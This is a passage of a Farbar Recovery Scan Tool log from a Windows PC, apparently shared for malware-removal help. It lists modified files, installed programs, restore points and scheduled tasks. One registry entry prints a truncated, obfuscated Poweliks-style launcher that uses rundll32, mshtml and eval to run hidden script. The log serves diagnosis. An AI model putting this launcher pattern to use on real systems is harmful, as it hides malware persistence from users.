2014-12-03 19:05 - 2014-12-03 19:05 - 00000155 ____N () C:\Windows\system32\2014-12-04-00-05-28.001-AvastVBoxSVC.exe-1800.log
2014-12-03 18:55 - 2014-12-03 18:55 - 00000155 ____N () C:\Windows\system32\2014-12-03-23-55-08.006-AvastVBoxSVC.exe-6684.log

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-02 15:42 - 2013-12-14 17:41 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-02 15:42 - 2012-06-28 07:53 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks
2015-01-02 15:42 - 2012-06-28 07:53 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks
2015-01-02 15:42 - 2012-06-28 07:50 - 00000000 ____D () C:\Program Files (x86)\Dell DataSafe Local Backup
2015-01-02 15:41 - 2014-08-16 01:00 - 00000000 ____D () C:\Users\anonymous\AppData\Local\Adobe
2015-01-02 15:41 - 2012-06-28 07:45 - 00000828 _____ () C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
2015-01-02 15:41 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-30 17:32 - 2012-08-31 03:09 - 00000000 ____D () C:\Users\anonymous\AppData\Local\CrashDumps
2014-12-30 17:32 - 2012-07-03 18:53 - 00000000 ____D () C:\Windows\Minidump
2014-12-30 17:32 - 2012-07-01 13:26 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-12-30 17:31 - 2013-07-24 16:42 - 00000981 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-12-30 17:23 - 2009-07-14 00:13 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-30 17:21 - 2014-08-18 03:30 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-30 17:13 - 2012-06-30 14:48 - 00000000 ____D () C:\Users\anonymous
2014-12-30 04:27 - 2013-12-14 17:41 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-30 04:08 - 2012-07-07 13:46 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-12-29 22:00 - 2012-09-23 14:37 - 00000508 _____ () C:\Windows\Tasks\GBM - New Backup Job-Incremental.job
2014-12-29 13:53 - 2012-06-28 07:45 - 00000830 _____ () C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
2014-12-28 22:00 - 2012-09-23 14:37 - 00000508 _____ () C:\Windows\Tasks\GBM - New Backup Job-Full.job
2014-12-28 12:26 - 2009-07-13 23:45 - 00028352 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-28 12:26 - 2009-07-13 23:45 - 00028352 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-28 05:11 - 2012-06-30 15:31 - 00004142 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-12-27 16:00 - 2013-05-22 08:04 - 00003440 ____N () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-12-26 20:36 - 2012-07-06 20:17 - 00000000 ____D () C:\Users\anonymous\AppData\Roaming\vlc
2014-12-26 18:39 - 2012-07-01 13:53 - 00000000 ____D () C:\Users\anonymous\AppData\Local\Microsoft Games
2014-12-26 18:37 - 2012-07-03 18:59 - 00000000 ___RD () C:\Users\anonymous\Desktop\legal
2014-12-25 14:24 - 2014-09-20 13:29 - 00000000 ____D () C:\Users\anonymous\Desktop\NEW  SCANNING
2014-12-17 18:57 - 2014-05-25 14:16 - 00000000 ____D () C:\ProgramData\WinCalendarV4
2014-12-16 18:09 - 2012-07-06 19:33 - 00000000 ___RD () C:\Users\anonymous\Desktop\P ROGRAM S
2014-12-16 18:08 - 2013-07-24 16:42 - 00000000 ____D () C:\Program Files\CCleaner
2014-12-11 18:10 - 2012-09-08 14:01 - 00000000 ____D () C:\photos for iPhone
2014-12-11 04:18 - 2014-01-15 04:15 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-12-11 03:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-12-11 03:20 - 2014-04-30 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-12-11 03:20 - 2012-06-30 17:57 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-11 03:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-11 03:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat
2014-12-11 03:04 - 2013-07-27 02:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-12-11 03:02 - 2012-07-05 15:54 - 112710672 ____N (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-12-10 08:08 - 2012-07-07 13:46 - 00701104 ____N (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-12-10 08:08 - 2012-07-07 13:46 - 00071344 ____N (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-12-10 08:08 - 2012-07-07 13:46 - 00003768 ____N () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-12-06 17:22 - 2013-05-25 18:51 - 00000000 ____D () C:\Users\anonymous\Desktop\PROJECTS
2014-12-06 17:13 - 2012-09-26 15:06 - 00000000 ___RD () C:\Archive
2014-12-06 16:59 - 2012-12-30 13:25 - 00000000 ____D () C:\photos - digital 6
2014-12-06 15:11 - 2014-08-18 03:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-06 14:30 - 2012-06-30 14:59 - 00000000 ____D () C:\Security
2014-12-06 14:18 - 2012-07-09 17:25 - 00000000 ____D () C:\Users\anonymous\AppData\Local\Mozilla
2014-12-03 18:54 - 2012-09-12 16:45 - 00000000 ____D () C:\Users\anonymous\AppData\Roaming\DVDVideoSoft

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-25 00:11

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-12-2014
Ran by anonymous at 2015-01-02 15:45:26
Running from C:\Users\anonymous\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Accidental Damage Services Agreement (HKLM-x32\...\{EF85FEF4-EB92-4075-A6D2-5F519BB30A2C}) (Version: 2.0.0 - Dell Inc.)
Acronis True Image Home (HKLM-x32\...\{67ED38A3-4882-448B-B44D-3428AB00D7D5}) (Version: 13.0.7154 - Acronis)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 14.0.0.110 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.5.23 - Adobe Systems Incorporated.)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Photoshop Elements 10 (HKLM-x32\...\Adobe Photoshop Elements 10) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Photoshop.com Inspiration Browser (HKLM-x32\...\PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1) (Version: 3.07 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Ahnenblatt 2.70 (HKLM-x32\...\Ahnenblatt_is1) (Version: 2.70.0.0 - Dirk Boettcher)
AMD Catalyst Install Manager (HKLM\...\{48B16A40-2B59-875B-5DE6-6A6AB2BE766D}) (Version: 3.0.859.0 - Advanced Micro Devices, Inc.)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version:  - AOL Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft PhotoStudio 6 (HKLM-x32\...\{ED8EF3C2-FA5B-4A1E-950D-5A0227161F97}) (Version: 6.0.1.148 - ArcSoft)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.115 - Atheros)
Avast Free Antivirus (HKLM-x32\...\avast) (Version: 10.0.2208 - AVAST Software)
Bing Bar (HKLM-x32\...\{C28D96C0-6A90-459E-A077-A6706F4EC0FC}) (Version: 7.0.765.0 - Microsoft Corporation)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
C4600 (x32 Version: 130.0.425.000 - Hewlett-Packard) Hidden
Canon CanoScan 9000F User Registration (HKLM-x32\...\Canon CanoScan 9000F User Registration) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM-x32\...\MP Navigator EX 3.1) (Version:  - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
CanoScan 9000F Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ9602) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.00 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.1.0.0 - Citrix Systems, Inc.)
Consumer In-Home Service Agreement (HKLM-x32\...\{F47C37A4-7189-430A-B81D-739FF8A7A554}) (Version: 2.0.0 - Dell Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell DataSafe Local Backup - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 9.4.67 - Dell Inc.)
Dell DataSafe Local Backup (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 9.4.67 - Dell Inc.)
Dell DataSafe Online (HKLM-x32\...\{7EC66A95-AC2D-4127-940B-0445A526AB2F}) (Version: 2.1.19634 - Dell)
Dell Digital Delivery (HKLM-x32\...\{AFC08A81-D3C5-46F4-8F08-876E4BA606EA}) (Version: 1.7.4502.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 9.0 - Dell Inc.)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.372.000 - Hewlett-Packard) Hidden
eBay (HKLM-x32\...\{A8B88634-7F90-402F-B66A-86429755F6A5}) (Version: 1.4.0 - eBay Inc.)
Elements 10 Organizer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Elevated Installer (x32 Version: 3.2.17.0 - Garmin Ltd or its subsidiaries) Hidden
Eraser 6.0.10.2620 (HKLM\...\{6E5159B4-A519-41EF-80EF-AD58371515DF}) (Version: 6.0.2620 - The Eraser Project)
Exif Tag Remover 4.3 (HKLM-x32\...\Exif Tag Remover_is1) (Version:  - RL Vision)
Flash Cookie Cleaner (HKLM-x32\...\{E4E1D7C7-6561-4462-96B5-E6439488ED41}) (Version: 2.0 - ConsumerSoft)
Garmin Communicator Plugin x64 (HKLM\...\{550331CC-C34B-494F-BCDA-37CE4EF6E924}) (Version: 4.0.3 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{b43ffffb-1adc-4bcb-b277-7844ebff94da}) (Version: 3.2.17.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 3.2.17.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 3.2.17.0 - Garmin Ltd or its subsidiaries) Hidden
Genie Backup Manager (HKLM\...\Genie Backup Manager) (Version: 9.0 - Genie9)
GIMP 2.8.6 (HKLM\...\GIMP-2_is1) (Version: 2.8.6 - The GIMP Team)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 10.2.0.822 - Citrix Online, a division of Citrix Systems, Inc.)
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 13.0 (HKLM\...\HPExtendedCapabilities) (Version: 13.0 - HP)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Photosmart C4600 All-In-One Driver Software 13.0 Rel .5 (HKLM\...\{44C81D1A-0520-49BB-B510-98B8DD414EA1}) (Version: 13.0 - HP)
HP Print Projects 1.0 (HKLM\...\HP Print Projects) (Version: 1.0 - HP)
HP Smart Web Printing 4.5 (HKLM\...\HP Smart Web Printing) (Version: 4.5 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
hpPrintProjects (x32 Version: 130.0.303.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
hpWLPGInstaller (x32 Version: 130.0.303.000 - Hewlett-Packard) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.35342 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.1.1399 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{538B98C3-773F-4F20-9C66-802D104DCBE2}) (Version: 1.23.219.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.2.0 - Mozilla)
Mozilla Thunderbird 31.2.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.2.0 (x86 en-US)) (Version: 31.2.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Multimedia Card Reader (HKLM-x32\...\InstallShield_{41068A8C-3F30-46B6-978A-EA692F28D1AF}) (Version: 1.7.915.93 - Fitipower)
Multimedia Card Reader (x32 Version: 1.7.915.93 - Fitipower) Hidden
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Nero BurningROM 12 (HKLM-x32\...\{3D9167B2-87EB-4713-90B4-E46F2CAFE28D}) (Version: 12.0.00300 - Nero AG)
Nero Prerequisite Installer 2.0 (HKLM-x32\...\{0DBC021C-95D9-435A-A4B0-E6515AFD1A71}) (Version: 12.0.01000 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.8.0 - Nikon)
Online Plug-in (x32 Version: 13.4.0.25 - Citrix Systems, Inc.) Hidden
Online Plug-in (x32 Version: 14.1.0.0 - Citrix Systems, Inc.) Hidden
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.14 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
PS_AIO_05_C4600_Software_Min (x32 Version: 130.0.425.000 - Hewlett-Packard) Hidden
PSE10 STI Installer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Quicken WillMaker Plus 2013 (HKLM-x32\...\{8065044B-2AF3-434E-A6E2-B7C60CDB978B}) (Version: 1.0.0.0 - Nolo)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6537 - Realtek Semiconductor Corp.)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Self-service Plug-in (x32 Version: 4.1.0.41738 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 13.0 - HP)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
SmartWebPrinting (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
Status (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Stream-Cloner V2.10 Build 301 (HKLM-x32\...\Stream-Cloner 2_is1) (Version: 2.10.0.301 - OpenCloner Inc.)
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TouchCopy 11 (HKLM-x32\...\{5AC396F4-3C70-452F-A7C8-54C84ECAED41}) (Version: 11.07 - Wide Angle Software)
TouchCopy 12 (HKLM-x32\...\{838F12C2-14CA-43A2-83C4-97681576C0D7}) (Version: 12.03 - Wide Angle Software)
TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.8.1 - Nikon)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
WinCalendar V4 (HKLM-x32\...\WinCalendar V4) (Version: 4.23 - Sapro Systems)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinZip (HKLM-x32\...\WinZip) (Version:  9.0  (6028) - WinZip Computing, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?

==================== Restore Points  =========================

04-11-2014 05:01:06 Windows Update
07-11-2014 05:09:00 Windows Update
11-11-2014 02:46:40 Windows Update
12-11-2014 03:00:17 Windows Update
18-11-2014 04:58:37 Windows Update
19-11-2014 03:00:11 Windows Update
25-11-2014 05:01:14 Windows Update
28-11-2014 19:09:43 avast! antivirus system restore point
02-12-2014 03:22:58 Windows Update
09-12-2014 05:40:04 Windows Update
10-12-2014 04:42:32 Spybot-S&D Spyware removal
11-12-2014 03:00:18 Windows Update
12-12-2014 03:00:10 Windows Update
16-12-2014 03:13:39 Windows Update
18-12-2014 03:00:10 Windows Update
23-12-2014 03:13:33 Windows Update
30-12-2014 00:45:12 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-12-10 04:43 - 00450776 ____R C:\Windows\system32\Drivers\etc\hosts

There are 1000 more lines.


==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {08F6EEE1-A556-4B35-B125-1352D38F8FA3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-14] (Google Inc.)
Task: {28AFF019-695A-4127-96F6-0D55C81C7BC6} - System32\Tasks\{58C545FD-8C76-4C72-BA22-508780BECD16} => C:\Security\cCleaner\CCleaner64.exe
Task: {2E8ECD91-E48E-4B60-AAE4-671E1D0E29F5} - System32\Tasks\{F3BD7F1F-51E1-4FAC-815F-E8A5B9DC6E78} => C:\Program Files (x86)\AOL Desktop 9.7a\aol.exe [2014-08-19] (AOL Inc.)
Task: {308D5A3C-8D68-4812-A261-5ABD047AE9E2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-14] (Google Inc.)
Task: {35FB8035-C6BF-4739-90D7-CA1D34DF1160} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-08-07] ()
Task: {40F910A8-7B62-4770-BF57-E2CDEED49600} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {43C3BDE6-44D1-4CB7-BF8C-29BA2EC6516F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-11-21] (Piriform Ltd)
Task: {484F4F01-3A84-419F-9E0D-B05AF85DDA1C} - System32\Tasks\GBM - New Backup Job-Full => C:\Program Files\Genie9\Genie Backup Manager\GBM.EXE [2012-06-04] (Genie9)
Task: {4D8EDD6E-E2BD-49DB-9A38-418C68446C1A} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2011-11-25] (Intel Corporation)
